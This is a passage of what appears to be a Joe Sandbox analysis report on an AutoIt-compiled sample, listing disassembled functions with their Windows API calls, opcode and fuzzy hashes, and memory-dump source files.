                                                                                                                                                • API String ID: 626452242-0
                                                                                                                                                • Opcode ID: c93e6a3eb9a6d688407833e22870bd64cceb27ec08fc5223209ff115d791dbce
                                                                                                                                                • Instruction ID: 72258c77ed7516e8a19400b189ca3d5e251976931c071f7c295551413344302f
                                                                                                                                                • Opcode Fuzzy Hash: c93e6a3eb9a6d688407833e22870bd64cceb27ec08fc5223209ff115d791dbce
                                                                                                                                                • Instruction Fuzzy Hash: A601DF713152047FEB196BB9AD0BFBF7AEDDB85300F14013EB106DA1E1EDA0AC108A20
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00214E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00214E9C
                                                                                                                                                  • Part of subcall function 00214E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00214EDD,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214EAE
                                                                                                                                                  • Part of subcall function 00214E90: FreeLibrary.KERNEL32(00000000,?,?,00214EDD,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214EC0
                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214EFD
                                                                                                                                                  • Part of subcall function 00214E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00214E62
                                                                                                                                                  • Part of subcall function 00214E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00253CDE,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214E74
                                                                                                                                                  • Part of subcall function 00214E59: FreeLibrary.KERNEL32(00000000,?,?,00253CDE,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214E87
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2632591731-0
                                                                                                                                                • Opcode ID: 4098dc99764eadba985eaa2c7e94e9e66a7e2710f318b884688a56e199bcb752
                                                                                                                                                • Instruction ID: 60601c0bad47d4fcdeab0b26c271062d35323dfb2e89f5523c83089a4d7d3f15
                                                                                                                                                • Opcode Fuzzy Hash: 4098dc99764eadba985eaa2c7e94e9e66a7e2710f318b884688a56e199bcb752
                                                                                                                                                • Instruction Fuzzy Hash: 92110431630205ABCF10FF60D802BEE77E49F60715F20442AF446AA2C1DE749AA59B50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __wsopen_s
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3347428461-0
                                                                                                                                                • Opcode ID: 9b1e20d357f84c23ab3ec0187accd54887513bafd4253588253ead5b7e52d57e
                                                                                                                                                • Instruction ID: 167ca451bf2fd2b699cc7c70644c00b6d8462be1a6639173d1422cde69389a47
                                                                                                                                                • Opcode Fuzzy Hash: 9b1e20d357f84c23ab3ec0187accd54887513bafd4253588253ead5b7e52d57e
                                                                                                                                                • Instruction Fuzzy Hash: AB11187591410AAFCB09DF58E98199E7BF5EF48314F144059FC08AB312DA31EA21CBA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNEL32(?,?,00010000,00000000,00000000), ref: 00219A9C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                • Opcode ID: 861bcd340fe16764386f0d94fd2e577cc824c97fba6983545ab4ee3b98422613
                                                                                                                                                • Instruction ID: b17ac8ced45c24d09094d279ec54515440c0ad13e97c98617a6fa45d94895a37
                                                                                                                                                • Opcode Fuzzy Hash: 861bcd340fe16764386f0d94fd2e577cc824c97fba6983545ab4ee3b98422613
                                                                                                                                                • Instruction Fuzzy Hash: 08116A312147019FD7248F05C8A0BA2B7F8AF54350F10C42DE99B86650C7B1A899CB60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00244C7D: RtlAllocateHeap.NTDLL(00000008,00211129,00000000,?,00242E29,00000001,00000364,?,?,?,0023F2DE,00243863,002E1444,?,0022FDF5,?), ref: 00244CBE
                                                                                                                                                • _free.LIBCMT ref: 0024506C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocateHeap_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 614378929-0
                                                                                                                                                • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                                                                                                • Instruction ID: 2eb01e6a4d5cc4336b4406e2eaa475b9bd2dab29ca5adf5d84162f8952053c47
                                                                                                                                                • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                                                                                                • Instruction Fuzzy Hash: A6012676214705ABE3258E65D881A9AFBE9FB89370F65051DE1C483281EA70A805CAB4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __alldvrm
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 65215352-0
                                                                                                                                                • Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                                                                                                                                • Instruction ID: 69287fb47f3cdb4bbdd243c7dfde9eefa11f25c0012ba63d61e9a848a9486cb4
                                                                                                                                                • Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                                                                                                                                • Instruction Fuzzy Hash: 5B01D8B1930348AFDF24DFA4CC457AEB7ECEB44325F51856EF41597140D6719D148B60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                                                                                                                                • Instruction ID: 9d218cd255104d0fb51b36a3b63983385fe35861ca83565b73faad6888678638
                                                                                                                                                • Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                                                                                                                                • Instruction Fuzzy Hash: 32F028B2530A14D7DF353E6A9C06B5B339C9F52335F12071AF920971D2CB70D8298EA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,00211129,00000000,?,00242E29,00000001,00000364,?,?,?,0023F2DE,00243863,002E1444,?,0022FDF5,?), ref: 00244CBE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                • Opcode ID: d2f429c324d6b89c9db48833917326ade2f70f6d96fb8e115661ea9532ae79fc
                                                                                                                                                • Instruction ID: 2ea184a8c0d6286883addbcfdac7195d847100242985dd379999a348518bb76b
                                                                                                                                                • Opcode Fuzzy Hash: d2f429c324d6b89c9db48833917326ade2f70f6d96fb8e115661ea9532ae79fc
                                                                                                                                                • Instruction Fuzzy Hash: 0EF0E931632225A7DB297F62EC89B5B3788BF417A1F1C4123FC19AA190CA70D8304AE0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,002E1444,?,0022FDF5,?,?,0021A976,00000010,002E1440,002113FC,?,002113C6,?,00211129), ref: 00243852
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                • Opcode ID: 32d4f6a24b633776fa06f48f4e94b4a8e46a33ca6f6607cdce7cd02d738112c2
                                                                                                                                                • Instruction ID: 185ad9c37776bcef0ee58cd49e8f00a044a8b51f54b9963bd98912fdc0ff493f
                                                                                                                                                • Opcode Fuzzy Hash: 32d4f6a24b633776fa06f48f4e94b4a8e46a33ca6f6607cdce7cd02d738112c2
                                                                                                                                                • Instruction Fuzzy Hash: 36E02B3253022697D735BE77AC04B9BB74AAF427B0F150032BC1496490DB61ED3189E0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 00244D9C
                                                                                                                                                  • Part of subcall function 002429C8: HeapFree.KERNEL32(00000000,00000000), ref: 002429DE
                                                                                                                                                  • Part of subcall function 002429C8: GetLastError.KERNEL32(00000000,?,0024D7D1,00000000,00000000,00000000,00000000,?,0024D7F8,00000000,00000007,00000000,?,0024DBF5,00000000,00000000), ref: 002429F0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorFreeHeapLast_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1353095263-0
                                                                                                                                                • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                                                                • Instruction ID: bd58201c4a6446648a93ab37398143fa3b8fa341850553ca321c055c7133f966
                                                                                                                                                • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                                                                • Instruction Fuzzy Hash: F2E09236110305DF8724DF6DD400A82B7F4EF843207208529F99DD3310D331E822CB80
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FreeLibrary.KERNEL32(?,?,002E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00214F6D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                • Opcode ID: 7ee5f0f6859e16bd38e1548bc46d03f422f0e32ff23b9e9e0b19064fe9a683a4
                                                                                                                                                • Instruction ID: 4aa9761a5f0506d43a5ae5df6848478c1409a65839848d995dee946fe344f535
                                                                                                                                                • Opcode Fuzzy Hash: 7ee5f0f6859e16bd38e1548bc46d03f422f0e32ff23b9e9e0b19064fe9a683a4
                                                                                                                                                • Instruction Fuzzy Hash: 6AF0A070125302CFCB34AF20D490892B7E4FF20319320897EE1DE86A10C7319899DF00
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetLongPathNameW.KERNEL32 ref: 00212DC4
                                                                                                                                                  • Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LongNamePath_wcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 541455249-0
                                                                                                                                                • Opcode ID: 7e502d757d682a90ac21ed3f62666d674ffb5639456cf943fbb9903ebd32d7b3
                                                                                                                                                • Instruction ID: 27301cd435283ad3238cc8fab5b61120867e6bed3f134b9e35397e03bd5c5815
                                                                                                                                                • Opcode Fuzzy Hash: 7e502d757d682a90ac21ed3f62666d674ffb5639456cf943fbb9903ebd32d7b3
                                                                                                                                                • Instruction Fuzzy Hash: E1E0CD726042245BC72092589C09FEA77DDDFC8790F050071FD09E7248D970AD948950
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __fread_nolock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2638373210-0
                                                                                                                                                • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                                                                • Instruction ID: d5e2f09d91c0e786cf93ca2a6d9cdeaef96cbf7d221bc4d475a97db637bf1049
                                                                                                                                                • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                                                                                • Instruction Fuzzy Hash: E3E048B461A7109FDF396E28A8517B677D89F49300F00045EF59B82252E57268558B4D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00213837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00213908
                                                                                                                                                  • Part of subcall function 0021D730: GetInputState.USER32 ref: 0021D807
                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00212B6B
                                                                                                                                                  • Part of subcall function 002130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0021314E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3667716007-0
                                                                                                                                                • Opcode ID: 2a0bce2f2a78fcd5f82a122f930f7ccaf44215a4c169115b91044a4d121ff006
                                                                                                                                                • Instruction ID: 779b4a871edb0532a56f7e0c205b4a1a660b2f01f1aac0f523ad737b3d7ae1cb
                                                                                                                                                • Opcode Fuzzy Hash: 2a0bce2f2a78fcd5f82a122f930f7ccaf44215a4c169115b91044a4d121ff006
                                                                                                                                                • Instruction Fuzzy Hash: F7E0263132424403CA04FB30B8565EDA3DA8BF5311F40043EF142872A2CE208AF94B52
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,00250704,?,?,00000000), ref: 002503B7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFile
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                • Opcode ID: ea445002bde49c3bab3b454ef7d9199a287928bad6714478596c5aa06edc7ead
                                                                                                                                                • Instruction ID: baf01df59aeb1f0ddb872ee9a0a888fd997e8c638a3b74c3c9c3c5667d799167
                                                                                                                                                • Opcode Fuzzy Hash: ea445002bde49c3bab3b454ef7d9199a287928bad6714478596c5aa06edc7ead
                                                                                                                                                • Instruction Fuzzy Hash: 34D06C3214020DBBDF028F84ED06EDA3BAAFB48714F114000BE1856020CB36E821AB90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SystemParametersInfoW.USER32 ref: 00211CBC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
